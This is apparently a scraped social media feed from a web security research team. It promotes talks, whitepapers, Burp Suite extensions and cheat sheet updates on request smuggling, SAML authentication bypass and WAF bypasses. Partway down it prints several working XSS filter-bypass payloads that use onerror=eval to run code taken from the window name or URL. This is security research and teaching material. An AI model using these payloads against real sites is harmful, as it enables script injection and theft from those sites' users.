PortSwigger Research

Love web & AI security research? Want to do it full time on-site with myself, Gareth Heyes & Zak Fedotkin? Join the PortSwigger Research team - we're hiring!

apply.workable.com/portswigger/...

We've updated our XSS cheat sheet to include 9 new vectors from @garethheyes.co.uk! Here are the top three, you can find the rest here: portswigger.net/web-security...

RomHack 2025 - James “albinowax” Kettle - HTTP/1.1 Must Die! The Desync Endgame YouTube video by Cyber Saiyan

The recording of "HTTP/1.1 must die: the desync endgame" has now landed on YouTube. Enjoy! www.youtube.com/watch?v=zr5y...

I’m excited to announce that I’ll be presenting The Fragile Lock: Novel Bypasses for SAML Authentication at Black Hat Europe! In this talk, I’ll show how I was able to continuously bypass security patches to achieve complete auth bypass for major libraries. #BHEU @blackhatevents.bsky.social

RomHack Conference 2025 Live Stream YouTube video by Cyber Saiyan

HTTP/1.1 Must Die is coming to #romhack2025 as the keynote! In-person tickets are sold out but you can still watch the livestream. This is your last chance to catch it live - register to watch here:
www.youtube.com/watch?v=T009...

I just published a Repeater feature to make it easier to explore request smuggling. It repeats your request until the status code changes. It's called "Retry until success" and you can install it via the Extensibility helper bapp.

Watch HTTP/1.1 Must Die live today at 1630 PST!
- In person at #defcon33 track 1, main stage
- Livestream via YouTube: www.youtube.com/watch?v=ssln...

HTTP/1.1 Must Die Upstream HTTP/1.1 is inherently insecure, and routinely exposes millions of websites to hostile takeover. Join the mission to kill HTTP/1.1 now

The whitepaper is live! Learn how to win the HTTP desync endgame... and why HTTP/1.1 needs to die: http1mustdie.com

It's easy to bash vulnerabilities with logos but... I couldn't resist, say hello to http1mustdie.com :)

I'm thrilled to announce "HTTP/1 Must Die! The Desync Endgame" is coming to #DEFCON33! This talk will feature multiple new classes of desync attack, mass exploitation spanning multiple CDNs, and over $200k in bug bounties. See you there!

Thrilled to finally release my latest research "The Single-Packet Shovel: Digging for Desync-Powered Request Tunnelling".

Desync vulnerabilities stemming from HP2 downgrading continue to plague even the largest vendors, have a read to find out how!

AMA: James Kettle on Burp Suite, AI & Security Research YouTube video by PortSwigger

The recording of my recent AMA with the Burp Suite Discord community has just landed on YouTube! 40 minutes of unscripted Q&A on security research, AI, and Burp Suite: youtu.be/mgmUZ9odkvU

<script>throw onerror=eval,{ lineNumber:1,columnNumber:1,fileName:1,message:name }</script> <svg onload="throw top.onerror=eval,{ lineNumber:1,columnNumber:1,fileName:1,message:'/*'+URL }">

<body onload="throw onerror=eval,{lineNumber:1,columnNumber:1,fileName:1,message:'/*'+location}"> <script>throw lineNumber=columnNumber=fileName=message=name,onerror=eval,{lineNumber,columnNumber,fileName,message}</script>

Firefox now opens the door to URL-based XSS payload smuggling too. Yep, even more ways to sneak past filters using the window name and clever URL tricks. Link to vectors👇

portswigger.net/web-security...

RomHack Conference, Training and Camp RomHack is a format made by the non-profit association Cyber Saiyan and composed by a Conference a Training session and a Hacker Camp.

I'm excited to announce I'll be delivering the keynote at RomHack this September! I can't share the title just yet but it's going to be a good one. See you in Rome!
romhack.io

I’m excited to introduce Namespace Confusion, a novel attack discovered during Gareth's and mySAML Roulette: The Hacker Always Wins research. We uncovered a brutal attack on XML signature validation that destroys authentication in Ruby-SAML!

SAML roulette: the hacker always wins Introduction In this post, we’ll show precisely how to chain round-trip attacks and namespace confusion to achieve unauthenticated admin access on GitLab Enterprise by exploiting the ruby-saml library

You might have noticed that the recent SAML writeups omit some crucial details. In "SAML roulette: the hacker always wins", we share everything you need to know for a complete unauthenticated exploit on ruby-saml, using GitLab as a case-study.

portswigger.net/research/sam...

We've just released Shadow Repeater, for AI-enhanced manual testing. Simply use Burp Repeater as you normally would, and behind the scenes Shadow Repeater will learn from your attacks, try payload permutations, and report any discoveries via Organizer.

portswigger.net/research/sha...

Top 10 Web Hacking Techniques of 2024 - James Kettle - ASW #318 YouTube video by Security Weekly - A CRA Resource

@jameskettle.com casually dropping info on the craziest sounding AI-enabled burp extension. Can you imagine messing about with a suspicious LFI candidate in repeater and without you doing anything differently than you do today, burp suddenly spits back the right payload?

We've updated our URL validation bypass cheat sheet with this shiny Domain allow list bypass payload contributed by dyak0xdb!

Top 10 web hacking techniques of 2024 Welcome to the Top 10 Web Hacking Techniques of 2024, the 18th edition of our annual community-powered effort to identify the most innovative must-read web security research published in the last year

The results are in! We're proud to announce the Top 10 Web Hacking Techniques of 2024! portswigger.net/research/top...

I'm super proud to announce my weekend project and latest #burpsuite extension written in Kotlin! 👾 I love hacking, finding problems or challenges during and the ability to fix them whilst improving my code-foo.

Introducing 🗒️ StickyBurp! 🗒️ -> github.com/GangGreenTem...

@portswiggerres.bsky.social

Top ten web hacking techniques of 2024: nominations open Nominations are now open for the top 10 new web hacking techniques of 2024! Every year, security researchers from all over the world share their latest findings via blog posts, presentations, PoCs, an

Nominations are now open for the Top 10 Web Hacking Techniques of 2024! Browse the contestants and submit your own here:
portswigger.net/research/top...

Bypassing WAFs with the phantom $Version cookie HTTP cookies often control critical website features, but their long and convoluted history exposes them to parser discrepancy vulnerabilities. In this post, I'll explore some dangerous, lesser-known

Did you know you can use an ancient magic cookie to downgrade parsers and bypass WAFs?! Hope you enjoy this quality bit of RFC-diving from @d4d89704243.bsky.social!
portswigger.net/research/byp...

YouTube Share your videos with friends, family, and the world

We’re finally live! You can now watch “Listen to the whispers: web timing attacks that actually work” on YouTube: youtube.com/watch?v=zOPj...

DEF CON 32 - Splitting the email atom exploiting parsers to bypass access controls - Gareth Heyes YouTube video by DEFCONConference

In case you missed it...the DEF CON video of my talk 'Splitting the Email Atom' is finally here! 🚀 Watch me demonstrate how to turn an email address into RCE on Joomla, bypass Zero Trust defences, and exploit parser discrepancies for misrouted emails. Don’t miss it:

youtu.be/JERBqoTllaE?...

DEF CON 32 - Gotta Cache ‘em all bending the rules of web cache exploitation - Martin Doyhenard YouTube video by DEFCONConference

If you like bounties, I highly recommend this presentation from Martin Doyhenard on novel web cache deception techniques. It comes with Web Security Academy labs too!
www.youtube.com/watch?v=70yy...

Hello world